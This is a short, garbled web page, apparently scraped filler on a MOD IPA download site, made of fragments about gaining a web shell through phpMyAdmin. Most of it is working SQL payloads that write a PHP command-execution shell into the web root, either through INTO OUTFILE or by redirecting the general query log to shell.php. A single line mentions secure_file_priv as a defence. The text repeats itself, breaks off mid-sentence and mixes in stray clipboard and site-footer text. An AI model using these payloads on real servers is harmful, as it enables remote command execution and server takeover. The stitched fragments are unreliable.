Phpmyadmin Hacktricks [hot] Jun 2026

SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/www/html/shell.php'; SELECT "<?php system($_GET['cmd']); ?>" -- Now every query is logged to shell.php. Trigger it.

SELECT "" INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. Copied to clipboard phpmyadmin hacktricks

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'; SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file

Example:

tab to dump entire databases in formats like SQL, CSV, or XML for offline analysis. Exploit-DB 3. Post-Exploitation: Gaining a Web Shell If the database user has sufficient permissions (e.g., SET GLOBAL general_log = 'ON'

: Set secure_file_priv to a specific directory to prevent arbitrary file writes. Wordpress - HackTricks

© 2019 - 2026 TUTUIPA.COM — The best place for MOD IPA games and programs